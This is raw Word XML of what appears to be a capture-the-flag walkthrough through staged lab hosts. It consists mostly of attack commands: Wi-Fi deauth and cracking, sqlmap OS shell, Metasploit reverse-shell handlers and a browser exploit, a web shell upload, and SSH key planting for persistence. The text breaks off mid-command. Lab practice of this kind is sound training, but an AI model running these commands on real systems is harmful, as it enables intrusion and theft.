        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D16DF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script=banner --version-intensity 5 10.0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D16DF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.0/22 -p 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1DB42" w14:textId="61EDFD73" w:rsidR="00D16DF3" w:rsidRDefault="00D16DF3" w:rsidP="00D16D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Found </w:t>
      </w:r>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.6.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> open on port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02210C8F" w14:textId="79E5E0BA" w:rsidR="00004668" w:rsidRDefault="00004668" w:rsidP="000046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SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8E333" w14:textId="206816B8" w:rsidR="00004668" w:rsidRDefault="00004668" w:rsidP="00D16D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004668">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "https://storage.googleapis.com/storage/v1/b/$bucket/o/wifi-ssh-key?project=$project&amp;alt=media" -H "Authorization: Bearer $token" -H "X-Cloud-Action: Storage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C5747" w14:textId="56C50562" w:rsidR="00004668" w:rsidRDefault="00004668" w:rsidP="00D16D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04668">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "https://storage.googleapis.com/storage/v1/b/$bucket/o/wifi-ssh-key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.pub</w:t>
      </w:r>
      <w:r w:rsidRPr="00004668">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?project=$project&amp;alt=media" -H "Authorization: Bearer $token" -H "X-Cloud-Action: Storage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C6B4C" w14:textId="6437EEFB" w:rsidR="002E09B1" w:rsidRDefault="002E09B1" w:rsidP="002E09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 them on desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E2F32" w14:textId="1BC1B73F" w:rsidR="002E09B1" w:rsidRDefault="002E09B1" w:rsidP="002E09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Remote SSH forward to fancy-bear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7FD35" w14:textId="329C2F59" w:rsidR="002E09B1" w:rsidRDefault="002E09B1" w:rsidP="002E09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2E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 19999:10.0.6.168:21 lord_nikon@10.0.7.6 -i ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 52961</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B12D71" w14:textId="6607CB9E" w:rsidR="002E09B1" w:rsidRDefault="002E09B1" w:rsidP="002E09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2E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> razor@127.0.0.1 -i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E09B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-key -p 19999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B5BF7" w14:textId="3E44339F" w:rsidR="00673827" w:rsidRDefault="00673827" w:rsidP="002E09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fancy-bear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D3B6B" w14:textId="55247147" w:rsidR="00673827" w:rsidRDefault="00673827" w:rsidP="0067382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73827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev sta3-wlan0 interface add mon0 type monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73033B" w14:textId="721AA168" w:rsidR="00673827" w:rsidRDefault="00673827" w:rsidP="0067382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73827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng --output-format </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --write </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>airoutcap.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mon0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160DA2B" w14:textId="4327AE22" w:rsidR="00673827" w:rsidRDefault="00673827" w:rsidP="0067382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73827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00673827">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-ng -0 10 -a 50:B0:19:AE:21:EF sta3-wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645025F1" w14:textId="08F2EE1A" w:rsidR="00F2181B" w:rsidRPr="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F218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2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In Local host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC1488" w14:textId="72080387" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181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F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P 19999 -i ~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-key razor@127.0.0.1:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/airoutcap.pcap-0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.cap ~/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D7AAE" w14:textId="106C1A77" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181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F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-ng -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifite.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">txt  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/Desktop/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>airoutcap.pcap-0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FF9F6" w14:textId="49620FC5" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F218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2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KEY FOUND! [ 1234567890 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203CDE9" w14:textId="526B5356" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181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F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>airdecap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ellingson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F2181B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-mineral ~/Desktop/airoutcap.pcap-02.cap -p 1234567890</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68DAC9" w14:textId="418949E5" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181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nano ~/Desktop/airoutcap.pcap-02-dec.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4A8D6" w14:textId="3AF3841A" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181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flag is inside :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1FA3A0" w14:textId="77777777" w:rsidR="00F2181B" w:rsidRDefault="00F2181B" w:rsidP="00F2181B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337F2719" w14:textId="01E97E9F" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AB388E" w14:textId="44A59287" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF32807" w14:textId="51E5C667" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521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GET TO CLOUD HOPPER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FAF120" w14:textId="3A77E053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session cookie from Cuiteur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E594A4" w14:textId="03E984E8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904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.0.3.107/php/recherche_old.php --cookie='PHPSESSID=[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COOKIE_HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]' --data="recherche=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C60D2" w14:textId="77FD047D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Upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40A220C7" w14:textId="2D5BC683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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AAA4C4A" w14:textId="77777777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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D8AED" w14:textId="77777777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LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0769FC" w14:textId="77777777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LPORT 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79B1C1" w14:textId="77777777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PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75A0CDDD" w14:textId="5690F583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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB5FFD" w14:textId="28B61CA9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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FB0D686" w14:textId="5B01D8CB" w:rsidR="009521A1" w:rsidRDefault="009E50A9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21A1" w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/browser/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009521A1" w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firefox_webidl_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E228D34" w14:textId="77777777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PAYLOAD </w:t>
      </w:r>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E8FB20B" w14:textId="77777777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LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE4C01" w14:textId="77777777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LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76374A" w14:textId="4B24E803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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772298B" w14:textId="301FA0C6" w:rsidR="009521A1" w:rsidRP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904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.3.107/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00904867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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61E5A423" w14:textId="53E24301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first shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3168E3" w14:textId="7EB8B712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 /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="664D19F7" w14:textId="787AE633" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="0063393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521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header(“Location: [URL]”) where URL is provided by step 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE3BF3" w14:textId="69069CF2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second shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFCC3A" w14:textId="3AED2D86" w:rsidR="009521A1" w:rsidRDefault="00117E96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21A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00B53E" w14:textId="38B60BBD" w:rsidR="009521A1" w:rsidRDefault="00117E96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21A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -i [new created session number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA9281" w14:textId="0E6E4E14" w:rsidR="009521A1" w:rsidRDefault="00117E96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21A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edit /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lord_nikon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/authorized_keys2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A7C428" w14:textId="7F0FF1A8" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521A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your SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C630A8" w14:textId="7A51D11E" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521A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521A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In home you can now access Buckeye through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E02679" w14:textId="0B6C092A" w:rsidR="009521A1" w:rsidRPr="009521A1" w:rsidRDefault="00117E96" w:rsidP="009521A1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9521A1" w:rsidRPr="009521A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009521A1" w:rsidRPr="009521A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lord_nikon@10.0.7.6 -p 52961</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEA466" w14:textId="350A4BA9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9521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 4444:10.0.6.133:445 lord_nikon@10.0.7.6 -p 52961 -i ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6812F61E" w14:textId="7F4E03C8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KEEP THIS </w:t>
      </w:r>
      <w:r w:rsidR="000E0E83">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSH CONNECTION OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6A8FC" w14:textId="51F9EBC9" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521A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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EC8F250" w14:textId="77777777" w:rsidR="009521A1" w:rsidRP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521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
